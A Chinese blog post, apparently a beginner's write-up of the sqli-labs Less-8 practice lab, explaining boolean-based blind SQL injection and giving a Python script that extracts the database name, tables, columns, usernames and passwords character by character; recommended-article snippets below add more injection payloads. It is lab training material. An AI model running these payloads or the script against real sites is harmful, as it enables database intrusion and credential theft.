小白日记 2day sqli-labs-master/Less 8

最新推荐文章于 2021-01-02 16:00:58 发布
最新推荐文章于 2021-01-02 16:00:58 发布
阅读量184 收藏
点赞数
分类专栏: 小白日记 小白 文章标签: python脚本 sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40514070/article/details/101076962
版权
Less 8 GET-Blind-Boolian Based-Single Quotes

拿到一个新的题目,首先先自己测一下,这里我们已经知道注入点在哪里了,直接开干就完事了。
在这里插入图片描述
首先测试?id=1可以看到这里出现了一串字符而不是图片,“you are in…”
在这里插入图片描述
再此测试,?id=1’,发现我们看不到那一串字符了,
在这里插入图片描述
是一个异常状态,但是并没有报错信息。可以初步判断,存在注入,但是返回信息没有报错那么详细的东西,所以它是一个‘盲注’。但是它存在两种状态,正常的时候,会显示一段字符,但是错误的时候会什么都没有。这就像bool函数,只有true和false两个return值。
接着,我们理一下思路,我们第一步需要知道它的数据库名字是什么?再然后,这个库下的表有几个,都是什么名字?再接着是列,在最后是值。
首先,我们猜测表的长度,使用到了一个函数,length(),顾名思义就是返回这个库名字长度的函数,正确“you are in…”,错误没有 you are

  • 第一次,令length(database())=1 明显不对 在这里插入图片描述
  • 。。。。。。经过多次的重复。。。。。。终于
  • 第8次,length(database())=8
    在这里插入图片描述
    得到长度之后,就要测试这个数据库的名字了,使用到的函数是这一个left(a,b),功能是返回a字符,从左到右b个字符,这里我们就要测试所有的字符[也就是符合mysql命名规范的],如果是手动试的话可以尝试二分法,用ascii码值比较,逐渐缩小范围,能看这个博客,相信这个实现对读者应该没有难度。这里测试的前两个,s,se,sec,secu,secur,…,自己试吧贴图。
    在这里插入图片描述
    知道这个以后就要尝试,去获取表了,和上述方法一样,就不再赘述了,举个例子吧。
?id=1' and left((select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),2)='ea' --+

这里解释一下把,left()函数没有发生改变,但是里边的字符串有一个选择问题,
就是limit,后边的数字第一个就是,起始位置,第二个是,从起始位置起,返回几个字符,这里只能比较一个所以就,写1,就OK了。
后边的就一样了,就不再做展示了。

前边做那么多的步骤,就是因为这个步骤过于繁琐,现在利用脚本实现。

# -*- coding:utf8 -*-
import requests
url='http://localhost/sqli-labs-master/Less-8/?id=1%27'
payload1= " and%20left({d}(),{n})=%27{s}%27%20--+"
payload2= " and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%20{t},1),{w},1))={A}%20--+"
payload3= " and%20%20left((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20limit%20{w},1),{n})=%27{c}%27%20--+"
payload4= " and left((select username from users where id={n}),{w})='{d}' --+"
payload5= " and left((select password from users where id={n}),{w})='{d}' --+"
#最后进行 操作的是 url-payload
list1=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',
       'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',
       '0','1','2','3','4','5','6','7','8','9','@','.','-','|','_','!','?','.']
list2=[64, 94, 96, 124, 176, 40, 41, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 173, 175, 95, 65, 66, 67, 68, 69, 70, 71,
       72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 97, 98, 99, 100, 101, 102, 103,
       104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 44]

strone='You are in...........'
print(type(strone))
#第一步确定数据库的名字
database=''
##第一小步:首先要知道数据库名字的长度
for i in range(1,50):
     for ss in list1:
         p=payload1.format(d='database',n=i,s=database+ss)
         u=requests.get(url+p)
         #print("访问的是:",url+p)
         #print(u.content)
         #print(type(u))
         if strone in u.text:
             database += ss
             print('正在对比databsaede的第',i,'个字符',database)
             #print(database)
             break
print('对比成功,database为:',database)
user=''
for i in range(1,50):
     for ss in list1:
         p=payload1.format(d='user',n=i,s=user+ss)
         u=requests.get(url+p)
         if strone in u.text:
             user += ss
             print('正在对比user的第',i,'个字符',user)
             #print(database)
             break
print('对比成功,database为:',user)
#第二小步去搞表名称
table1=''
table2=''
table3=''
table4=''
for i in range(0,4):
    for j in range(0,15):
        for s in list2:
            p=payload2.format(t=i,w=j,A=s)
            u=requests.get(url+p)
            if strone in u.text:
                if i == 0:
                    table1 += chr(s) #ascii转化
                    print('正在对比第1个表,','第',j,'个字符',table1)
                elif i == 1:
                    table2 += chr(s)
                    print('正在对比第2个表,','第',j,'个字符',table2)
                elif i == 2:
                    table3 += chr(s)
                    print('正在对比第3个表,','第',j,'个字符',table3)
                elif i == 3:
                    table4 += chr(s)
                    print('正在对比第4个表,','第',j,'个字符',table4)
                    break
#第三步,获取users中的东西
column=['','','','','','']
for j in range(0,3):
    for i in range(1,9):
        for l in list1:
            p=payload3.format(w=j,n=i,c=column[j]+l)
            u=requests.get(url+p)
            if strone in u.text:
                column[j] += l
                print('正在对比第',j+1,'个字段第',i,'个字符',column[j])
                break
#第四步,获取值
username=['','','','','','','','','','','','','','','','','','','','','','','','','']
password=['','','','','','','','','','','','','','','','','','','','','','','','','']
for i in range(1,15):
    for j in range(1,11):
        for l in list1:
            p=payload4.format(n=i,w=j,d=username[i-1]+l)
            u=requests.get(url+p)
            if strone in u.text:
                username[i-1]+=l
                print('正在对比第',i,'个记录的username的第',j,'个字符',username[i-1])
for i in range(1,15):
    for j in range(1,11):
        for l in list1:
            p=payload5.format(n=i,w=j,d=password[i-1]+l)
            u=requests.get(url+p)
            if strone in u.text:
                password[i-1]+=l
                print('正在对比第',i,'个记录的password的第',j,'个字符',password[i-1])


print('数据库名:',database)
print('user:',user)
print('表名为:',table1,table2,table3,table4)
print('列名:',column)
print('username:',username)
print('password:',password)
藤原拓海s
关注
专栏目录
sqli-labs-master第八关
FourthGuy的博客
10-09 1661
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码
最详细的讲解 让你最快通关Less-9-Less-10/ --时间盲注http://127.0.0.1/sqli-labs-master/Less-10/ --时间盲注
m0_58883317的博客
04-17 5524
http://127.0.0.1/sqli-labs-master/Less-10/ --时间盲注 判断注入点 http://127.0.0.1/sqli-labs-master/Less-10/?id=1 and 1=1 and sleep(5) http://127.0.0.1/sqli-labs-master/Less-10/?id=1 and 1=1 and sleep(5) 根据页面显示我们可以知道使用联合注入是不可行的。页面无论对错都只显示you are in所以我们选择和less-9一样
[SQLi-LABS] Less-8
Stan冲冲冲
05-11 99
基于布尔型的盲注 手动: /Less-8/?id=1'--+ /Less-8/?id=1'and (length(database()))>0--+ and substr((select database()),1,1)="s" /Less-8/?id=1'and substr((select database()),1,1)="s"--+ //爆库 /Less-8/?id=1' and substr((select group_concat(table_name) from informat
SQL注入学习——Bool盲注详解 sqli-labs(Less 8)
未完成的歌~的博客
07-29 6641
Less-7导出文件GET字符型注 打开页面输入?id=1 试了很多发现报错信息都一样,查看下源代码: if($row) { echo '<font color= "#FFFF00">'; echo 'You are in.... Use outfile......'; echo "<br>"; echo "</font>"; ......
sqli-labs-less-8 布尔盲注+延时注入(详解)
yzcn
10-30 827
Less-8 延时注入+布尔盲注 判断注入点: http://127.0.0.1/sqli-labs-master/Less-8/?id=1 显示正常 http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ 无任何回显 http://127.0.0.1/sqli-labs-master/Less-8/?id=1’ --+ 显示正常,找到注入点,该题特点为正确时返回you are in,错误时无任何回显,可以考虑用之前的布尔盲注或者延时注入进行解题 方法一(布尔盲
sqli-labs ---- Less-8 & Less-9 & Less-10
__52Hz__
07-28 364
http://blog.csdn.net/nixawk/article/details/27807759
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs less8 Get -Blind -Boolian based -Single quotes
Monster1m的博客
01-02 216
一、输入id,页面正常 http://127.0.0.1/sqli-labs-master/Less-8/?id=1 二、判断闭合方式以及注入方式 1.添加单引号,显示错误页面且无报错信息 http://127.0.0.1/sqli-labs-master/Less-8/?id=1' 2.添加注释符,页面正常显示,则闭合方式为单引号 http://127.0.0.1/sqli-labs-master/Less-8/?id=1'--+ 3.由于没显示错误信息,所以选择盲注,这关提示用布尔盲注 三、判断
sqli-labs-Less-7、8、9、10
giun的博客
02-10 1065
Less-7 注意在要对文件进行导入导出首先得要有足够的权限, 但是mysql默认不能导入和导出文件,这与secure_file_priv的值有关(默认为null) secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。 1、当secure_file_priv的值为null ,表示限制mysqld ...
Sqli-labs第5~8关详解
qq_45927819的博客
09-29 1179
文章目录第五关报错注入floor报错语句注入:extractvalue函数进行报错注入第六关第七关 第五关 当输入?id=1时显示下面的页面 当输入?id=1'时显示异常 页面没有显示位。无法使用联合查询注入。 显示位的解释:在一个网站正常的界面,服务端执行Sql语句查询数据库中的数据,客户端会将数据显示在页面中,这个显示数据的位置就叫做显示位。 如: 报错注入 什么是报错注入呢? 报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。0x7e=’~’ 首先介绍三种报
Sqli-labs less 8
weixin_34347651的博客
08-11 350
Less-8 经过简单的测试,我们发现 'or 1=1--+返回正常,那么我们就基本知道应该怎么使用了,参考less5.这里简单的进行一个示例: http://127.0.0.1/sqllib/Less-8/?id=1%27and%20If(ascii(substr(database(),1,1))=115,1,sleep(5))--+ 这里用的延时注入,当然了我们使用布尔类型的注入...
Blind SQL Injection
Nixawk
04-23 1390
https://www.owasp.org/index.php/Blind_SQL_Injection
Sqli-labs之Less-8
→_→
03-30 1910
Less-8 GET-盲注-基于布尔值-单引号 根据题目提示可知这是单引号注入且需要通过盲注进行通关,那么首先利用单引号看一下网页的回显: 测试是否是注入点 发现什么也没有,也就是说网页不会返回任何报错信息,也不会返回其他信息即没有任何回显信息, Less1、5、7、8回显对比 ...
sqli-labs ————less -8
Fly_鹏程万里
05-11 1006
Less-8为了好分析,我们首先可以查看一下源代码关键代码:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql);从这里我们可以看到,可以通过' or 1=1 --+或者  ' and 1=1 来绕过从源文件中我们可以看到,该文件中将“print mysql_error”进行了注释,所以这里我们...
SQLi-Labs 学习笔记(Less 1-10)
热门推荐
Onlyme的博客
03-11 1万+
点击打开链接http://blog.csdn.net/u012763794/article/details/51207833http://blog.csdn.net/u012763794/article/details/51361152http://blog.csdn.net/u012763794/article/details/51457142Less-1 基于错误的 - get 单引号 - 字...
毕业设计论文SpringBoot+Vue畅销图书推荐系统.docx
最新发布
10-16
毕业设计论文
sqli-labs-master/Less-17
07-28
Less-17 是一个 SQL 注入实验,它位于 sqli-labs-master 实验室的目录中。在这个实验中,你可以学习和实践 SQL 注入攻击的技术。 SQL 注入是一种常见的网络安全漏洞,它允许攻击者通过在应用程序的输入字段中注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值